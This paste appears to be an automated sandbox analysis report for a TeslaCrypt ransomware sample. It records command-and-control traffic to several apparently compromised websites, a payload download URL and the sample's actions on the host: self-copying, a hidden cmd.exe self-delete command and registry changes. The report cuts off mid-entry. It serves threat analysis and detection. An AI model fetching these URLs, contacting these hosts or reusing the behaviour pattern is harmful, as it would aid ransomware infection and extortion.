opexxx

446071be407efeb4e0d7c83bb504774a

Dec 4th, 2015
668
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 385.64 KB | None | 0 0
  1.  
  2. Bot Communication Details:
  3. Server DNS Name: apotheke-stiepel.com   Service Port: 80  Signature Name: Trojan.TeslaCrypt
  4. Direction   Command User-Agent  Host    Connection  Pragma
  5. GET /tmp/misc.php?C11C3B537C7D807D855777DB654F6A0BDC1591D647A14248AAA4E20F179A91CC2C
  6.    CDBDE434B01781911FA635784514AAB62D4170DF3C21CFEABD6267274BE93AFE6105571E31C0A
  7.    3F06C4123D7E295E92D5FCB0D8ABFEFC426C3306BF4B0FFB78BFDAA459739683A5271F9229605
  8.    7426B147C4E97BEC4E3DC9A8AA8FF59BC8B17B6CD31261628F39EDF335A52E68DFB4EF2EDA48A
  9.    F2D2C167C54BFF8EDF6010BCAB3DC95525DD29FA65F853576EC0E681E27BAE7A21A69E74048DF
  10.    5C89377C521324C6719C7116EF1CEF0DB8484EE4F07AECB845DB8FB81F2FA8AA14F10BDBC99BD
  11.    49A60BBDF83417106A0D1568F7E11835FC51442D97B633E2DF8AADC00DC035CA69D949A619F98
  12.    D202C67130EA12CD9D7DC8A5D75852BAE0B21BB5F9434F93419D26496D608F3D9743896BB0F00
  13.    C2CC0AF2F1D2702700CABD29065CC05A9779A4C66416AEBC3E67808542F930534B61AE3F808C5
  14.    AB5633B016EDFD83AC0F94 HTTP/1.1  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko apotheke-stiepel.com    Keep-Alive 
  15. GET /tmp/misc.php?572A56481F78D91A71F483FAC3626A6F3F0B199F77247528100DF8D9FB4CBD158E
  16.    BD9497F2B1EDDF97B66305AF836A15BFE7901D398BA1ADEA745BB88F4B4C2D71FDEAB1AA019AF
  17.    9A37F7E8B1F6BD99597AA53B1922D67FF6FDE3E5C3C740A2FC47EF3F3B1A5D6A665F0CB44DEC8
  18.    60DC3927DC27FA84E55C9DB4F1CDD48426281322B32C98B97E673668F8F882E5F0EE8B30D7B0F
  19.    0EC773C56AA20784A1C69A0576AFCDE80C5A0A37558533541801B8685CED94DF94C18D8A9630F
  20.    E57EC9497F67E677FE56C8847B7D999A3D0F503E813A0A2D421CCBB0F83651FFB681D3D8FC231
  21.    B2928C2C7036183AEADF90BB3965297ADAD041F68CE543A79118915ED6EF72D55633A57934EF8
  22.    EB9A5DA3E1FE5863F7208C52BD9BB8958BCA4B099315FFCAF873395A915D9D89BFEBCD3AAEC28
  23.    52F44183B63D1E173A28E91F96C432632987744191699096A6CB81CDEDB8FFBC2A3371273794D
  24.    308CCD62AA630BB553512B HTTP/1.1  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko apotheke-stiepel.com    Keep-Alive 
  25. GET /tmp/misc.php?D75E24DAF74403E668692C761F1277D3DEE05B23699A462E770EF7C2B412992CF5
  26.    79C27ED71DDFF27867BA8FE680524E9DC1B12FA8A608C8E3C714A816B5B6ECB39828673488886
  27.    EDD684BB273BD5EE7FA6879A277F0ED2BCFFBAA66BD0EC300BB314DFB89A428EA39102CBE12A8
  28.    5690DB42544535A414366FFF6475337D8827FA5E03CCCCC178BF2D1E4CEB5CF2D983F4CE37903
  29.    A867E050EDD8AB2663B433D5366DD07CDB93063457352CC78B1D963808544AE0B2FA25C22729A
  30.    AAFA1A675B2AB24793ECF5FFDB44C2DF35303DDC11F60C961E92F7E05C60D8C3AABE63EF88C31
  31.    F619BC083B6192D4E67006512603847927A299AA1E205B0722E6F577D6772FEBB773675FFB634
  32.    419B548E84D34B69CC48EABAB159BA3CCE08D47E04E061E3E0F289E104B86DC1227513A7F0026
  33.    7FFB40A26D9F8B2D029418D54DFCE65F971E9818E24B4511F3627FBD8B95CD49B600E36A22736
  34.    183A6B341C90EC4BB2CD03 HTTP/1.1  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko apotheke-stiepel.com    Keep-Alive 
  35. Server DNS Name: leboudoirdesbrunettes.com   Service Port: 80  Signature Name: Trojan.TeslaCrypt
  36. Direction   Command User-Agent  Host    Connection  Pragma
  37. GET /wp-content/uploads/misc.php?572A56481F78D91A71F483FAC3626A6F3F0B199F77247528100
  38.    DF8D9FB4CBD158EBD9497F2B1EDDF97B66305AF836A15BFE7901D398BA1ADEA745BB88F4B4C2D
  39.    71FDEAB1AA019AF9A37F7E8B1F6BD99597AA53B1922D67FF6FDE3E5C3C740A2FC47EF3F3B1A5D
  40.    6A665F0CB44DEC860DC3927DC27FA84E55C9DB4F1CDD48426281322B32C98B97E673668F8F882
  41.    E5F0EE8B30D7B0F0EC773C56AA20784A1C69A0576AFCDE80C5A0A37558533541801B8685CED94
  42.    DF94C18D8A9630FE57EC9497F67E677FE56C8847B7D999A3D0F503E813A0A2D421CCBB0F83651
  43.    FFB681D3D8FC231B2928C2C7036183AEADF90BB3965297ADAD041F68CE543A79118915ED6EF72
  44.    D55633A57934EF8EB9A5DA3E1FE5863F7208C52BD9BB8958BCA4B099315FFCAA323B761D1D190
  45.    E8CAB3E1442891A31A1DC476B04BCA261904E95C497043794C841EA9578FCE15497BCB559670C
  46.    379AB137012A649B0BCDAA5CA14762D69939C HTTP/1.1   Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko leboudoirdesbrunettes.com   Keep-Alive 
  47. GET /wp-content/uploads/misc.php?C11C3B537C7D807D855777DB654F6A0BDC1591D647A14248AAA
  48.    4E20F179A91CC2CCDBDE434B01781911FA635784514AAB62D4170DF3C21CFEABD6267274BE93A
  49.    FE6105571E31C0A3F06C4123D7E295E92D5FCB0D8ABFEFC426C3306BF4B0FFB78BFDAA4597396
  50.    83A5271F92296057426B147C4E97BEC4E3DC9A8AA8FF59BC8B17B6CD31261628F39EDF335A52E
  51.    68DFB4EF2EDA48AF2D2C167C54BFF8EDF6010BCAB3DC95525DD29FA65F853576EC0E681E27BAE
  52.    7A21A69E74048DF5C89377C521324C6719C7116EF1CEF0DB8484EE4F07AECB845DB8FB81F2FA8
  53.    AA14F10BDBC99BD49A60BBDF83417106A0D1568F7E11835FC51442D97B633E2DF8AADC00DC035
  54.    CA69D949A619F98D202C67130EA12CD9D7DC8A5D75852BAE0B21BB5F9434F93608462E7D7FABD
  55.    7E61E72BE32036A170D9974292B0C8638664073D4E68ED2EF2DA35B8E0E10E4F55DAEE4C59C75
  56.    618C65EF8CB9B0FF1D4E457F18EE7DA2B2060 HTTP/1.1   Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko leboudoirdesbrunettes.com   Keep-Alive 
  57. GET /wp-content/uploads/misc.php?D75E24DAF74403E668692C761F1277D3DEE05B23699A462E770
  58.    EF7C2B412992CF579C27ED71DDFF27867BA8FE680524E9DC1B12FA8A608C8E3C714A816B5B6EC
  59.    B39828673488886EDD684BB273BD5EE7FA6879A277F0ED2BCFFBAA66BD0EC300BB314DFB89A42
  60.    8EA39102CBE12A85690DB42544535A414366FFF6475337D8827FA5E03CCCCC178BF2D1E4CEB5C
  61.    F2D983F4CE37903A867E050EDD8AB2663B433D5366DD07CDB93063457352CC78B1D963808544A
  62.    E0B2FA25C22729AAAFA1A675B2AB24793ECF5FFDB44C2DF35303DDC11F60C961E92F7E05C60D8
  63.    C3AABE63EF88C31F619BC083B6192D4E67006512603847927A299AA1E205B0722E6F577D6772F
  64.    EBB773675FFB634419B548E84D34B69CC48EABAB159BA3CCE08D47E04E061E34764A023F2D2D6
  65.    64607F1590B855E6D4264C0E8440CECCA7EFDAC7F93269C7A3682C2E784DF76277ECD19B7DB16
  66.    A7BB6CE6881215579872C8BD570CE43C678BC HTTP/1.1   Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko leboudoirdesbrunettes.com   Keep-Alive 
  67. Server DNS Name: myexternalip.com   Service Port: 80  Signature Name: Trojan.TeslaCrypt
  68. Direction   Command User-Agent  Host    Connection  Pragma
  69. GET /raw HTTP/1.1   Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko myexternalip.com       
  70. GET /raw HTTP/1.1   Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko myexternalip.com       
  71. Server DNS Name: regiefernando.me   Service Port: 80  Signature Name: Trojan.TeslaCrypt
  72. Direction   Command User-Agent  Host    Connection  Pragma
  73. GET /images/slideshow/sysmisc.php?C11C3B537C7D807D855777DB654F6A0BDC1591D647A14248AA
  74.    A4E20F179A91CC2CCDBDE434B01781911FA635784514AAB62D4170DF3C21CFEABD6267274BE93
  75.    AFE6105571E31C0A3F06C4123D7E295E92D5FCB0D8ABFEFC426C3306BF4B0FFB78BFDAA459739
  76.    683A5271F92296057426B147C4E97BEC4E3DC9A8AA8FF59BC8B17B6CD31261628F39EDF335A52
  77.    E68DFB4EF2EDA48AF2D2C167C54BFF8EDF6010BCAB3DC95525DD29FA65F853576EC0E681E27BA
  78.    E7A21A69E74048DF5C89377C521324C6719C7116EF1CEF0DB8484EE4F07AECB845DB8FB81F2FA
  79.    8AA14F10BDBC99BD49A60BBDF83417106A0D1568F7E11835FC51442D97B633E2DF8AADC00DC03
  80.    5CA69D949A619F98D202C67130EA12CD9D7DC8A5D75852BAE0B21BB5F9434F9358ACC50820886
  81.    D3CB707006675EC6EDE50EDFAFD1DFA022DCC45B4E04A175B4506B811A0C6E5C172DF55C96E66
  82.    29C6D5B3A55607AF46CA96C08D2369301A1B9E HTTP/1.1  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko regiefernando.me    Keep-Alive 
  83. GET /images/slideshow/sysmisc.php?D75E24DAF74403E668692C761F1277D3DEE05B23699A462E77
  84.    0EF7C2B412992CF579C27ED71DDFF27867BA8FE680524E9DC1B12FA8A608C8E3C714A816B5B6E
  85.    CB39828673488886EDD684BB273BD5EE7FA6879A277F0ED2BCFFBAA66BD0EC300BB314DFB89A4
  86.    28EA39102CBE12A85690DB42544535A414366FFF6475337D8827FA5E03CCCCC178BF2D1E4CEB5
  87.    CF2D983F4CE37903A867E050EDD8AB2663B433D5366DD07CDB93063457352CC78B1D963808544
  88.    AE0B2FA25C22729AAAFA1A675B2AB24793ECF5FFDB44C2DF35303DDC11F60C961E92F7E05C60D
  89.    8C3AABE63EF88C31F619BC083B6192D4E67006512603847927A299AA1E205B0722E6F577D6772
  90.    FEBB773675FFB634419B548E84D34B69CC48EABAB159BA3CCE08D47E04E061E3715A2A1665459
  91.    77BAC3040E4D08E3C3EDCBE49316159727545C42873003046D051792BEDD3DAE13BD786C5C82B
  92.    93F04C03C3E4C9AE4766346625AB28BA15E48E HTTP/1.1  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko regiefernando.me    Keep-Alive 
  93. Server DNS Name: schriebershof.de   Service Port: 80  Signature Name: Trojan.TeslaCrypt
  94. Direction   Command User-Agent  Host    Connection  Pragma
  95. GET /tmp/misc.php?C11C3B537C7D807D855777DB654F6A0BDC1591D647A14248AAA4E20F179A91CC2C
  96.    CDBDE434B01781911FA635784514AAB62D4170DF3C21CFEABD6267274BE93AFE6105571E31C0A
  97.    3F06C4123D7E295E92D5FCB0D8ABFEFC426C3306BF4B0FFB78BFDAA459739683A5271F9229605
  98.    7426B147C4E97BEC4E3DC9A8AA8FF59BC8B17B6CD31261628F39EDF335A52E68DFB4EF2EDA48A
  99.    F2D2C167C54BFF8EDF6010BCAB3DC95525DD29FA65F853576EC0E681E27BAE7A21A69E74048DF
  100.    5C89377C521324C6719C7116EF1CEF0DB8484EE4F07AECB845DB8FB81F2FA8AA14F10BDBC99BD
  101.    49A60BBDF83417106A0D1568F7E11835FC51442D97B633E2DF8AADC00DC035CA69D949A619F98
  102.    D202C67130EA12CD9D7DC8A5D75852BAE0B21BB5F9434F931ABA777D85BCE4587831E4F30B4E9
  103.    7EFC9E059A09F63E35D1F217B98E20ABF42858D57234306425B2E7BE3355035CB415A30B71097
  104.    DEA1BDE6CF7405DADC1379 HTTP/1.1  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko schriebershof.de    Keep-Alive 
  105. GET /tmp/misc.php?D75E24DAF74403E668692C761F1277D3DEE05B23699A462E770EF7C2B412992CF5
  106.    79C27ED71DDFF27867BA8FE680524E9DC1B12FA8A608C8E3C714A816B5B6ECB39828673488886
  107.    EDD684BB273BD5EE7FA6879A277F0ED2BCFFBAA66BD0EC300BB314DFB89A428EA39102CBE12A8
  108.    5690DB42544535A414366FFF6475337D8827FA5E03CCCCC178BF2D1E4CEB5CF2D983F4CE37903
  109.    A867E050EDD8AB2663B433D5366DD07CDB93063457352CC78B1D963808544AE0B2FA25C22729A
  110.    AAFA1A675B2AB24793ECF5FFDB44C2DF35303DDC11F60C961E92F7E05C60D8C3AABE63EF88C31
  111.    F619BC083B6192D4E67006512603847927A299AA1E205B0722E6F577D6772FEBB773675FFB634
  112.    419B548E84D34B69CC48EABAB159BA3CCE08D47E04E061E3CE60098A9D0E1EC0A913E690C8AD5
  113.    74F3751CFB31D866987E554D48072BD0FE839B2EAB05A463A2456CED41CF35407C611165C3E85
  114.    F0DE5739433E3537DF761D HTTP/1.1  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko schriebershof.de    Keep-Alive 
  115. Server DNS Name: woodenden.com   Service Port: 80  Signature Name: Trojan.TeslaCrypt
  116. Direction   Command User-Agent  Host    Connection  Pragma
  117. GET /sysmisc.php?C11C3B537C7D807D855777DB654F6A0BDC1591D647A14248AAA4E20F179A91CC2CC
  118.    DBDE434B01781911FA635784514AAB62D4170DF3C21CFEABD6267274BE93AFE6105571E31C0A3
  119.    F06C4123D7E295E92D5FCB0D8ABFEFC426C3306BF4B0FFB78BFDAA459739683A5271F92296057
  120.    426B147C4E97BEC4E3DC9A8AA8FF59BC8B17B6CD31261628F39EDF335A52E68DFB4EF2EDA48AF
  121.    2D2C167C54BFF8EDF6010BCAB3DC95525DD29FA65F853576EC0E681E27BAE7A21A69E74048DF5
  122.    C89377C521324C6719C7116EF1CEF0DB8484EE4F07AECB845DB8FB81F2FA8AA14F10BDBC99BD4
  123.    9A60BBDF83417106A0D1568F7E11835FC51442D97B633E2DF8AADC00DC035CA69D949A619F98D
  124.    202C67130EA12CD9D7DC8A5D75852BAE0B21BB5F9434F936BA028085EB42F08AB7F9F0C6708F2
  125.    B1C07780E9B51A3543D3DC9434FB19E3E0658D925C2CC39288456432594B52BBFF HTTP/1.1  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko woodenden.com   Keep-Alive 
  126. GET /sysmisc.php?D75E24DAF74403E668692C761F1277D3DEE05B23699A462E770EF7C2B412992CF57
  127.    9C27ED71DDFF27867BA8FE680524E9DC1B12FA8A608C8E3C714A816B5B6ECB39828673488886E
  128.    DD684BB273BD5EE7FA6879A277F0ED2BCFFBAA66BD0EC300BB314DFB89A428EA39102CBE12A85
  129.    690DB42544535A414366FFF6475337D8827FA5E03CCCCC178BF2D1E4CEB5CF2D983F4CE37903A
  130.    867E050EDD8AB2663B433D5366DD07CDB93063457352CC78B1D963808544AE0B2FA25C22729AA
  131.    AFA1A675B2AB24793ECF5FFDB44C2DF35303DDC11F60C961E92F7E05C60D8C3AABE63EF88C31F
  132.    619BC083B6192D4E67006512603847927A299AA1E205B0722E6F577D6772FEBB773675FFB6344
  133.    19B548E84D34B69CC48EABAB159BA3CCE08D47E04E061E3DBE3FA33607B5B98A8AB3DA6EAF460
  134.    839BE1CADA38864B9DE1F2091F0CCB8C507FB8D3A80A2867E27161015EB4119FF8 HTTP/1.1  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko woodenden.com   Keep-Alive 
  135.  
  136. Callback communication observed from VM:
  137. Server DNS Name: 199.16.199.3   Service Port: 80  Signature Name: Trojan.TeslaCrypt
  138. Direction   Command User-Agent  Host    Connection  Pragma
  139. GET /images/slideshow/sysmisc.php?D75E24DAF74403E668692C761F1277D3DEE05B23699A462E77
  140.    0EF7C2B412992CF579C27ED71DDFF27867BA8FE680524E9DC1B12FA8A608C8E3C714A816B5B6E
  141.    CB39828673488886EDD684BB273BD5EE7FA6879A277F0ED2BCFFBAA66BD0EC300BB314DFB89A4
  142.    28EA39102CBE12A85690DB42544535A414366FFF6475337D8827FA5E03CCCCC178BF2D1E4CEB5
  143.    CF2D983F4CE37903A867E050EDD8AB2663B433D5366DD07CDB93063457352CC78B1D963808544
  144.    AE0B2FA25C22729AAAFA1A675B2AB24793ECF5FFDB44C2DF35303DDC11F60C961E92F7E05C60D
  145.    8C3AABE63EF88C31F619BC083B6192D4E67006512603847927A299AA1E205B0722E6F577D6772
  146.    FEBB773675FFB634419B548E84D34B69CC48EABAB159BA3CCE08D47E04E061E3715A2A1665459
  147.    77BAC3040E4D08E3C3EDCBE49316159727545C42873003046D051792BEDD3DAE13BD786C5C82B
  148.    93F04C03C3E4C9AE4766346625AB28BA15E48E HTTP/1.1  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko regiefernando.me    Keep-Alive 
  149. GET /images/slideshow/sysmisc.php?C11C3B537C7D807D855777DB654F6A0BDC1591D647A14248AA
  150.    A4E20F179A91CC2CCDBDE434B01781911FA635784514AAB62D4170DF3C21CFEABD6267274BE93
  151.    AFE6105571E31C0A3F06C4123D7E295E92D5FCB0D8ABFEFC426C3306BF4B0FFB78BFDAA459739
  152.    683A5271F92296057426B147C4E97BEC4E3DC9A8AA8FF59BC8B17B6CD31261628F39EDF335A52
  153.    E68DFB4EF2EDA48AF2D2C167C54BFF8EDF6010BCAB3DC95525DD29FA65F853576EC0E681E27BA
  154.    E7A21A69E74048DF5C89377C521324C6719C7116EF1CEF0DB8484EE4F07AECB845DB8FB81F2FA
  155.    8AA14F10BDBC99BD49A60BBDF83417106A0D1568F7E11835FC51442D97B633E2DF8AADC00DC03
  156.    5CA69D949A619F98D202C67130EA12CD9D7DC8A5D75852BAE0B21BB5F9434F9358ACC50820886
  157.    D3CB707006675EC6EDE50EDFAFD1DFA022DCC45B4E04A175B4506B811A0C6E5C172DF55C96E66
  158.    29C6D5B3A55607AF46CA96C08D2369301A1B9E HTTP/1.1  Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko regiefernando.me    Keep-Alive 
  159.  
  160. Suspicious network behavior observed from VM:
  161.  
  162. Download Source Headers
  163. GET    
  164.  /kldf/cachec50da2243ebb9d634cfad3427cafcc61/73.exe?1 HTTP/1.1
  165.     Server     
  166.  Apache
  167. Host   
  168.  baneyconstruction.com
  169.     Last-Modified  
  170.  Thu, 03 Dec 2015 09:50:03 GMT
  171. User-Agent     
  172.  Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
  173.     ETag   
  174.  "61c00-525fb509feb78"
  175. Accept     
  176.  text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  177.     Accept-Ranges  
  178.  bytes
  179. Accept-Language    
  180.  de,en-US;q=0.7,en;q=0.3
  181.     Content-Length     
  182.  400384
  183. Accept-Encoding    
  184.  gzip, deflate
  185.     Keep-Alive     
  186.  timeout=5, max=100
  187. Connection     
  188.  keep-alive
  189.     Connection     
  190.  Keep-Alive
  191. HTTP   
  192.  1.1 200 OK
  193.     Content-Type   
  194.  application/x-msdownload
  195. Date   
  196.  Thu, 03 Dec 2015 09:51:45 GMT
  197.        
  198. OS Change Detail   (version: 1.1290)     | Items: 997  | OS Info: Microsoft Windows7 64-bit 6.1 sp1 15.0826   Top
  199. Type    Mode/Class  Details (Path/Message/Protocol/Hostname/Qtype/ListenPort etc.)  Process ID  Parent ID   File Size
  200. Analysis   
  201. Malware
  202.    
  203.              
  204. Application
  205.    
  206.              
  207. 3 Repeated items skipped
  208. Config  Update 
  209.    
  210.              
  211. Uac
  212. Service
  213.    
  214. Multimedia Class Scheduler
  215.              
  216. Process
  217. Started
  218.    
  219. C:\Users\Administrator\AppData\Local\Temp\73.exe
  220.   Parentname:  C:\Windows\explorer.exe
  221.   Command Line:  "C:\Users\Administrator\AppData\Local\Temp\73.exe"
  222.   MD5:  446071be407efeb4e0d7c83bb504774a
  223.   SHA1: ef06d2b504ce08b2d6570ca4b4f923a1ad428f7a
  224.     2252    1092    400384
  225. Uac
  226. Service
  227.    
  228. Windows Error Reporting Service
  229.              
  230. File   
  231. Failed
  232.    
  233. C:\Windows\System32\WOW64LOG.DLL
  234.     2252         
  235. Regkey 
  236. Queryvalue
  237.    
  238. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  239.     2252         
  240. File   
  241. Failed
  242.    
  243. C:\Users\ADMINI~1\AppData\Local\Temp\A.CONFIG
  244.     2252         
  245. API Call   
  246.    
  247.  API Name:  Sleep   Address:  0x0042232d
  248.  Params:  [15]
  249.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  kernel32.dll
  250.     2252         
  251. API Call   
  252.    
  253.  API Name:  Sleep   Address:  0x0042232d
  254.  Params:  [15]
  255.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  kernel32.dll
  256.     2252         
  257. API Call   
  258.    
  259.  API Name:  Sleep   Address:  0x0042232d
  260.  Params:  [15]
  261.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  kernel32.dll
  262.     2252         
  263. File   
  264. Failed
  265.    
  266. C:\Users\ADMINI~1\AppData\Local\Temp\A
  267.     2252         
  268. File   
  269. Failed
  270.    
  271. C:\Users\Administrator\AppData\Local\Temp\MPR.DLL
  272.     2252         
  273. Mutex  
  274.    
  275. \Sessions\1\BaseNamedObjects\DBWinMutex
  276.     2252         
  277. File   
  278. Failed
  279.    
  280. C:\Windows\SysWOW64\RPCSS.DLL
  281.     2252         
  282. API Call   
  283.    
  284.  API Name:  Sleep   Address:  0x0042232d
  285.  Params:  [15]
  286.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  kernel32.dll
  287.     2252         
  288. API Call   
  289.    
  290.  API Name:  Sleep   Address:  0x0042232d
  291.  Params:  [15]
  292.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  kernel32.dll
  293.     2252         
  294. 5 Repeated items skipped
  295. API Call   
  296.    
  297.  API Name:  GetSystemDirectoryW   Address:  0x7732f96e
  298.  Params:  [0x77396420, 260]
  299.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  kernel32.dll
  300.     2252         
  301. Mutex  
  302.    
  303. \Sessions\1\BaseNamedObjects\AMResourceMutex3
  304.     2252         
  305. File   
  306. Failed
  307.    
  308. C:\Users\Administrator\AppData\Local\Temp\DWMAPI.DLL
  309.     2252         
  310. File   
  311. Failed
  312.    
  313. C:\Users\Administrator\AppData\Local\Temp\MSVFW32.DLL
  314.     2252         
  315. File   
  316. Failed
  317.    
  318. C:\Users\Administrator\AppData\Local\Temp\PROFAPI.DLL
  319.     2252         
  320. API Call   
  321.    
  322.  API Name:  NtAdjustPrivilegesToken   Address:  0x7584ca4f
  323.  Params:  [SeDebugPrivilege, Enabled]
  324.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  ntdll.dll
  325.     2252         
  326. API Call   
  327.    
  328.  API Name:  GetTokenInformation   Address:  0x0041e934
  329.  Params:  [0x1bc, 0x19]
  330.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  advapi32.dll
  331.     2252         
  332. API Call   
  333.    
  334.  API Name:  GetTokenInformation   Address:  0x0041e976
  335.  Params:  [0x1bc, 0x19]
  336.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  advapi32.dll
  337.     2252         
  338. API Call   
  339.    
  340.  API Name:  Sleep   Address:  0x0042232d
  341.  Params:  [15]
  342.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  kernel32.dll
  343.     2252         
  344. API Call   
  345.    
  346.  API Name:  Sleep   Address:  0x0042232d
  347.  Params:  [15]
  348.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  kernel32.dll
  349.     2252         
  350. 4 Repeated items skipped
  351. File   
  352. Failed
  353.    
  354. C:\Users\Administrator\AppData\Roaming\73.EXE
  355.     2252         
  356. File   
  357. Created
  358.    
  359. C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  360.     2252         
  361. Malicious  Alert   
  362. Malicious  Directory
  363.    
  364. Message:   Executable file created in suspicious location    Detail:   Process creating executable file in suspicious location  
  365.              
  366. Malicious  Alert   
  367. Misc  Anom
  368.    
  369. Message:   Generic Trojan Behavior    Detail:   Generic Trojan Behavior  
  370.              
  371. File   
  372. Open
  373.    
  374. C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  375.     2252         
  376. File   
  377. Date  Change
  378.    
  379. C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  380.     2252        400384
  381. File   
  382. Close
  383.    
  384. C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  385.  MD5:  446071be407efeb4e0d7c83bb504774a
  386.  SHA1: ef06d2b504ce08b2d6570ca4b4f923a1ad428f7a
  387.     2252        400384
  388. Process
  389. Started
  390.    
  391. C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  392.  Parentname:  C:\Users\Administrator\AppData\Local\Temp\73.exe
  393.  Command Line:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  394.  MD5:  446071be407efeb4e0d7c83bb504774a
  395.  SHA1: ef06d2b504ce08b2d6570ca4b4f923a1ad428f7a
  396.     328 2252    400384
  397. Malicious  Alert   
  398. Process  Cloned
  399.    
  400. Message:   Process clones and starts itself    Detail:   Process clones and starts itself  
  401.              
  402. File   
  403. Failed
  404.    
  405. C:\Users\Administrator\AppData\Roaming\UI\SWDRM.DLL
  406.     2252         
  407. API Call   
  408.    
  409.  API Name:  ShellExecuteW   Address:  0x0041f88d
  410.  Params:  [0x0, NULL, C:\Windows\system32\cmd.exe, /c DEL C:\Users\ADMINI~1\AppData\Local\Temp\73.exe, NULL, 0]
  411.  Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  Shell32.dll
  412.     2252         
  413. Malicious  Alert   
  414. Generic  Anomalous  Activity
  415.    
  416. Message:   Hidden ShellExecute call made    Detail:   Hidden ShellExecute call made  
  417.              
  418. File   
  419. Failed
  420.    
  421. C:\Users\Administrator\AppData\Local\Temp\PROPSYS.DLL
  422.     2252         
  423. File   
  424. Failed
  425.    
  426. C:\Windows\System32\WOW64LOG.DLL
  427.     328      
  428. Regkey 
  429. Queryvalue
  430.    
  431. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  432.     328      
  433. File   
  434. Failed
  435.    
  436. C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches
  437.     2252         
  438. File   
  439. Failed
  440.    
  441. C:\Users\Administrator\AppData\Local\Temp\NTMARTA.DLL
  442.     2252         
  443. File   
  444. Failed
  445.    
  446. C:\Users\Administrator\AppData\Local\Temp\CRYPTSP.DLL
  447.     2252         
  448. File   
  449. Failed
  450.    
  451. C:\Users\Administrator\AppData\Local\Temp\RPCRTREMOTE.DLL
  452.     2252         
  453. API Call   
  454.    
  455.   API Name:  Sleep   Address:  0x7760d98d
  456.   Params:  [60000]
  457.   Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  kernel32.dll
  458.     2252         
  459. File   
  460. Failed
  461.    
  462. C:\Users\Administrator\AppData\Local\Temp\SECUR32.DLL
  463.     2252         
  464. Mutex  
  465.    
  466. \Sessions\1\BaseNamedObjects\ZonesCacheCounterMutex
  467.     2252         
  468. Regkey 
  469. Deleteval
  470.    
  471. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  472.    on\Internet Settings\ZoneMap\"ProxyBypass"
  473.     2252         
  474. Regkey 
  475. Deleteval
  476.    
  477. \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"P
  478.   roxyBypass"
  479.     2252         
  480. Regkey 
  481. Deleteval
  482.    
  483. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  484.    on\Internet Settings\ZoneMap\"IntranetName"
  485.     2252         
  486. Regkey 
  487. Deleteval
  488.    
  489. \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"I
  490.   ntranetName"
  491.     2252         
  492. Regkey 
  493. Setval
  494.    
  495. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  496.    on\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
  497.     2252         
  498. Regkey 
  499. Setval
  500.    
  501. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  502.   on\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
  503.     2252         
  504. Mutex  
  505.    
